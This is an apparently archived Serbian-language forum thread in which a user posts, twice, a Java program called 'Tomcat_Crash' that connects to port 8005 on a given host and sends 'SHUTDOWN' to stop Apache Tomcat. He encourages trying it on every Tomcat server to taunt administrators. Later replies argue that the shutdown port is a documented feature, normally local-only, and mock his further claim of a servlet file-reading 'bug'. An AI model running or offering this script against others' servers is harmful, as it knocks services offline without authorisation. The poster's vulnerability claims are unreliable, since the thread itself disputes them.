Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Tomcat exploit by me

[es] :: Java :: Tomcat exploit by me

[ Pregleda: 3203 | Odgovora: 19 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

weB_KiLeR

Član broj: 238
Poruke: 1317
*.panet.co.yu



Profil

icon Tomcat exploit by me17.01.2003. u 18:42 - pre 225 meseci
Nasao sam nekoliko bug-ova na tomcat-u...
Uglavnom vam prezentiram prvi:
Citat:

/*Coded by Mil0s 2.1.2001.
mail: [email protected]
ICQ : 106635840*/

//Imports
import java.io.*;
import java.net.*;

public class Tomcat_Crash
{
public static void main(String[] args)
throws IOException {
/*
*Declarations
*/
int PORT= 8005;
String adress = null;
Socket socket = null;
/*
*Check the comamnd line for url
*/
if (args.length != 1)
{
System.out.print( "*****************************************************************************\n"
+"************Tomcat_Crash the first Tomcat exploit coded by Mil0s*************\n"
+"*****************************************************************************\n"
+"+------------------------+\n"
+"|mail: [email protected]|\n"
+"|ICQ uin: 106635840 |\n"
+"|site: www.coders.co.yu |\n"
+"+------------------------+\n");

System.out.println("Usage: java Tomcat_Crash <adress>");
return;
}else
adress = args[0];
try
{
socket = new Socket(adress,PORT);
/*
*Connecting to it and crashing it ...
*/
System.out.println("Connecting on" + adress + "\n" +"Crashing it...");
PrintWriter out =
new PrintWriter(
new BufferedWriter(
new OutputStreamWriter(
socket.getOutputStream())),true);
out.println("SHUTDOWN");
System.out.println("Tomcat is crashed :-)");
}//End of try
catch (IOException e)
{
System.out.println("Cannot connect on " + adress
+"check if you type adress correctly if you get this message again then the system is not vulnerable");
}

}//End of main

}//End of programm


To je bio kod a ovde imate objasnjeno:

[quote]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
***********Tomcat_Crash source code explaind***********
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Where is a bug???
Heh here it is:
<Server port="8005" shutdown="SHUTDOWN" debug="0">
Yes it is from server.conf what this line does???
Let's look at my source code :


/*Coded by Mil0s 2.1.2001.
mail: [email protected]
ICQ : 106635840*/

//Imports
import java.io.*;
import java.net.*;

public class Tomcat_Crash
{
public static void main(String[] args)
throws IOException {
/*
*Declarations
*/
int PORT= 8005;
String adress = null;
Socket socket = null;
/*
*Check the comamnd line for url
*/
if (args.length != 1)
{
System.out.print( "*****************************************************************************\n"
+"************Tomcat_Crash the first tomcat exploit coded by Mil0s*************\n"
+"*****************************************************************************\n"
+"+------------------------+\n"
+"|mail: [email protected]|\n"
+"|ICQ uin: 106635840 |\n"
+"|site: www.coders.co.yu |\n"
+"+------------------------+\n");

System.out.println("Usage: java Tomcat_Crash <adress>");
return;
}else
adress = args[0];
try
{
socket = new Socket(adress,PORT);
/*
*Connecting to it and crashing it ...
*/
System.out.println("Connecting on" + adress + "\n" +"Crashing it...");
PrintWriter out =
new PrintWriter(
new BufferedWriter(
new OutputStreamWriter(
socket.getOutputStream())),true);
out.println("SHUTDOWN");
System.out.println("Tomcat is crashed :-)");
}//End of try
catch (IOException e)
{
System.out.println("Cannot connect on " + adress
+"check if you type adress correctly if you get this message again the then system is not vulnerable");
}

}//End of main

}//End of programm

Yeah code is little :-) hehe...
out.println("SHUTDOWN"); -> this pice of code is whole exploit only thing you must do is to connect on port 8005 on host that have tomcat for webserver and then type "SHUTDOWN" without ""...
Pretty dumm heh whell many of admin's are dumm so you try that on evry server who got tomcat and remember if you crash a tomcat whole web server is crashed :)
Sure you can play mouse and cats with sys Admin's beacuse they will not know how that happend ;)

|++++++++++++++++++++++++++++++++++++++++++++|
|coded by Mil0s |
|mail:[email protected] |
|ICQ: 106635840 |
|++++++++++++++++++++++++++++++++++++++++++++|
 
Odgovor na temu

B o j a n
eCTRL
EU

Član broj: 1178
Poruke: 2925
*.net.yu

Jabber: bc@default.co.yu
Sajt: default.co.yu/~bc


+1 Profil

icon Re: Tomcat exploit by me17.01.2003. u 23:41 - pre 225 meseci
Lepo l;)

Zasto ne bi objavio tu slabost na bugtraq-u, ili nekoj slicnoj security listi.
"It's okay, I'm just admiring to the shape of your skull!" -- Dr. Gonzo
 
Odgovor na temu

BobMarley
Vedran B
Bologna

Član broj: 148
Poruke: 1161
*.net.hinet.hr

ICQ: 61882680


+1 Profil

icon Re: Tomcat exploit by me18.01.2003. u 01:06 - pre 225 meseci
... ponosno predstavlja remek djelo exploit(u javi), tako kompliciran da smo ga i objasnili... :D ... i stvarno zahtjeva dobro napisan exploit code da bi mogli izvesti ..


sta to je The first tomcat exploit ?
http://online.securityfocus.com/cgi-bin/sfonline/vulns.pl
potrazi apache software foundation / tomcat


p.s. engleski prva liga .... kao i uvijek
BobMarley (me) ...the legend
 
Odgovor na temu

BobMarley
Vedran B
Bologna

Član broj: 148
Poruke: 1161
*.net.hinet.hr

ICQ: 61882680


+1 Profil

icon Re: Tomcat exploit by me18.01.2003. u 01:42 - pre 225 meseci
najnovije u svijetu hehe .... http://www.google.com/search?h...hutdown&btnG=Google+Search

kako kaze Bill "to nije ranjivost nego opcija"

... e kileru ti kada se pojavis uvijek neki smijeh ...
jesi to otkrio ranjivost na svom webserveru na svojoj masini ? jer na taj port se moze pristupiti samo sa masine na kojoj je pokrenut webserver ...
Ali eto samo malo koda jos napisi i pretvori exploit u "local exploit"
BobMarley (me) ...the legend
 
Odgovor na temu

weB_KiLeR

Član broj: 238
Poruke: 1317
*.panet.co.yu



Profil

icon Re: Tomcat exploit by me18.01.2003. u 15:57 - pre 225 meseci
Slusaj taj exploit radi preko mreze bar je radio kad sam ga ja probao...
Da je radio samo iz locala nebih ga ni napisao ...
Uglavnom tomcat ima bug da mozete preko servleta/jsp-a da listate sve direktorijume da otvarate sve file-ove na kompu i tako dalje...
A kad mozete da otvarate file-ove mozete sve :-)
ta uzmete class-u da je decompile-irate i nadjete user i pass gde se on konektuje na mySQL itd...
Shvatate sta hocu da kazem...
 
Odgovor na temu

weB_KiLeR

Član broj: 238
Poruke: 1317
*.panet.co.yu



Profil

icon Re: Tomcat exploit by me18.01.2003. u 16:03 - pre 225 meseci
Citat:
BobMarley:
sta to je The first tomcat exploit ?


Znas ti kad sam ja to napisao ???
Tada kad sam trazio nisam nasao ni jedan exploit za tomcat ...
I nemoj vise da seres!!!
To je napisano odavno a evo sad sam ga stavio ovde iz cimanja inace do dzedzi na mom kompu vise od godinu dana...
 
Odgovor na temu

Floyd

Član broj: 576
Poruke: 975
*.yubc.net



+3 Profil

icon Re: Tomcat exploit by me18.01.2003. u 16:13 - pre 225 meseci
Sto nisi stavio pre godinu dana?
Razlika izmedju prakse i teorije je mnogo veca u praksi nego u teoriji.
 
Odgovor na temu

BobMarley
Vedran B
Bologna

Član broj: 148
Poruke: 1161
*.net.hinet.hr

ICQ: 61882680


+1 Profil

icon Re: Tomcat exploit by me18.01.2003. u 18:00 - pre 225 meseci
instant hacker ! ($2.99)


BobMarley (me) ...the legend
 
Odgovor na temu

B o j a n
eCTRL
EU

Član broj: 1178
Poruke: 2925
194.247.209.*

Jabber: bc@default.co.yu
Sajt: default.co.yu/~bc


+1 Profil

icon Re: Tomcat exploit by me19.01.2003. u 08:06 - pre 225 meseci
Citat:
weB_KiLeR:
A kad mozete da otvarate file-ove mozete sve :-)


O, ne !

Ovo je stvarno bilo diskreditivno.
A ja sam pomislio ... nah, lock it.
"It's okay, I'm just admiring to the shape of your skull!" -- Dr. Gonzo
 
Odgovor na temu

c00l_daem0n
Beograd

Član broj: 309
Poruke: 294
*.31.EUnet.yu

Jabber: andrew@elitesecurity.org
ICQ: 53650656


Profil

icon Re: Tomcat exploit by me19.01.2003. u 21:11 - pre 225 meseci

[/quote]

Znas ti kad sam ja to napisao ???
Tada kad sam trazio nisam nasao ni jedan exploit za tomcat ...
I nemoj vise da seres!!!
To je napisano odavno a evo sad sam ga stavio ovde iz cimanja inace do dzedzi na mom kompu vise od godinu dana...[/quote]

Ajde sad... nemoj jos vise da se glupiras, priznaj lepo i zdravo.
Svakom se moze desiti, jednostavno nisi bio dovoljno upucen u tomcat, pa sta.
Toliko je ocigledno da si se presao, da sad ovo izvlacenje je sasvim suvisno i glupo.

pozdrav.




Would you translate me on the other page in face = Da li biste me preveli na drugu stranu ulice
 
Odgovor na temu

BobMarley
Vedran B
Bologna

Član broj: 148
Poruke: 1161
*.net.hinet.hr

ICQ: 61882680


+1 Profil

icon Re: Tomcat exploit by me19.01.2003. u 22:45 - pre 225 meseci
necu ja da ti "serem", ali shvati da TI NISI nasao BUG u tomcatu niti prije godinu dana niti sada ....

to sto ti sada tu valjas su mogucnosti tomcata ... tomcat omogucuje da ga sa localne masine ugasis preko tog porta i to je to ....

ali ajde mozda netko bude koristio tvoj exploit ako si bude htio ugasiti masinu, sam sebi.

a koja su ta druga dva sto si isto nasao ?
BobMarley (me) ...the legend
 
Odgovor na temu

weB_KiLeR

Član broj: 238
Poruke: 1317
*.panet.co.yu



Profil

icon Re: Tomcat exploit by me24.01.2003. u 13:42 - pre 225 meseci
Nemam ja sta da priznajem blah blah blah ja sam probao na umrezenim masinama pod win-om i radilo je verovao ti ili ne ko ne veruje nek dodje do mene i pokazacu mu ...
Uglavnom mozete preko servlet-a da listate direktorijume na hard disku i da otvarate sve file-ove...
 
Odgovor na temu

alex
Aleksandar Radulovic
Senior Software Engineer, Spotify
Stockholm, Sweden

Član broj: 71
Poruke: 2194
*.habil.is

Jabber: alex@a13x.info
ICQ: -1
Sajt: www.a13x.info


+1 Profil

icon Re: Tomcat exploit by me24.01.2003. u 15:07 - pre 225 meseci
Cekaj, web_Killer, hoces da kazes da si nasao bug po kome servlet instaliran na serveru moze da cita fajlove sa tog servera?
Alex: My favorite site is http://localhost/
R.J. Oppenheimer: "I am become death, destroyer of worlds" (1945 AD)
tweet.13x ||
linkedin.13x
 
Odgovor na temu

01011011
Avanade
CHICAGO, USA

Član broj: 561
Poruke: 2341
67.241.19.*

ICQ: 45747235
Sajt: www.snailtrail.net


+2 Profil

icon Re: Tomcat exploit by me27.01.2003. u 22:03 - pre 225 meseci
Nije vam fer ljudi,
zar niko ne vjeruje da bi neko nas mogao da napise exploit?
Glupost...ne kontam koja je poenta vas koji mislite da ste bolji od web killera, on je barem nesto prikazao, a vi????

Ajde malko tisinica :)
 
Odgovor na temu

BobMarley
Vedran B
Bologna

Član broj: 148
Poruke: 1161
*.net.hinet.hr

ICQ: 61882680


+1 Profil

icon Re: Tomcat exploit by me27.01.2003. u 23:18 - pre 225 meseci
01itd.

nemoj da pricas ako ne razumijes , ili nisi bas dobro procitao o cemu se radi, blamira se on blamiras se ti koji to podrzavas, blam za Java forum kojemu ovako i onako ne ide bas najbolje u zadnje vrijeme..... jednostavno obrisite ovu najblaze receno "glupost" ... i rijesen slucaj ...
BobMarley (me) ...the legend
 
Odgovor na temu

kobrejabre
Bgd

Član broj: 1793
Poruke: 269
*.fon.bg.ac.yu

Sajt: www.nemam.com


Profil

icon Re: Tomcat exploit by me27.01.2003. u 23:31 - pre 225 meseci
Citat:
alex:
Cekaj, web_Killer, hoces da kazes da si nasao bug po kome servlet instaliran na serveru moze da cita fajlove sa tog servera?

Alex je pogodio poentu.

Dakle, ne poricem da se mali killer trudi da nesto nauci, za njegove godine nije ni los, ali ova tema je bas ispala smesna.
Dakle, on je nasao 'bug' po kome servlet moze da cita i otvara fajlove?... Pa to je sasvim normalno, ali stvar je u sledecem: kako bi ti, killeru, postavio SVOJ sarvlet na MOJ (ili bilo ciji tudji) web server pa da citas i otvaras fajlove. E, kad bi taj nacin nasao, onda bi mogao da kazes da si nasao bug. Ovako, samo se blamiras...
 
Odgovor na temu

01011011
Avanade
CHICAGO, USA

Član broj: 561
Poruke: 2341
*.cisit.calumet.purdue.edu

ICQ: 45747235
Sajt: www.snailtrail.net


+2 Profil

icon Re: Tomcat exploit by me28.01.2003. u 19:39 - pre 225 meseci
Citat:
BobMarley:
01itd.

nemoj da pricas ako ne razumijes , ili nisi bas dobro procitao o cemu se radi, blamira se on blamiras se ti koji to podrzavas, blam za Java forum kojemu ovako i onako ne ide bas najbolje u zadnje vrijeme..... jednostavno obrisite ovu najblaze receno "glupost" ... i rijesen slucaj ...



Ja se care ne blamiram, nego mi izgleda da je ovaj forum postao k**** u zadnje vrijeme i svi se nesto pale kao da znaju a niko nista ne zna, i svako pokusava da disuje svakoga, ne kontam koja je poenta... ??? Ja ne podrzavam WebKillera, jednostavno nisam u tom fazonu, h4cker wannabe, ali kazem da se manete, ukoliko covjek to voli neka trazi code po interenetu, pise svoje ime i postuje pustite ga... Ne mora doma neko da se napravi pametan da pocme da disuje, mislim koji smo mi srbi narod... Treba nas unistiti matere mi...
 
Odgovor na temu

BobMarley
Vedran B
Bologna

Član broj: 148
Poruke: 1161
*.net.hinet.hr

ICQ: 61882680


+1 Profil

icon Re: Tomcat exploit by me28.01.2003. u 22:54 - pre 225 meseci
ti ne razumjes jednu stvar , uopce nije fazno sada da li je neko u nekakvom fazonu ili ne , i ne raspravlja se o tome sta su hakeri, kako biti bla bla bla .. to su dosadne izlizane teme ... nesto drugo je tema tu procitaj sve postove pa ces skuziti ....
BobMarley (me) ...the legend
 
Odgovor na temu

01011011
Avanade
CHICAGO, USA

Član broj: 561
Poruke: 2341
*.cisit.calumet.purdue.edu

ICQ: 45747235
Sajt: www.snailtrail.net


+2 Profil

icon Re: Tomcat exploit by me29.01.2003. u 00:37 - pre 225 meseci
ait dawg nek ti bude...
 
Odgovor na temu

spartak

Član broj: 5625
Poruke: 631
*.beograd-3.tehnicom.net



+3 Profil

icon Re: Tomcat exploit by me16.02.2003. u 22:54 - pre 224 meseci
Citat:
01011011:
Treba nas unistiti matere mi...


??? :-(
 
Odgovor na temu

[es] :: Java :: Tomcat exploit by me

[ Pregleda: 3203 | Odgovora: 19 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.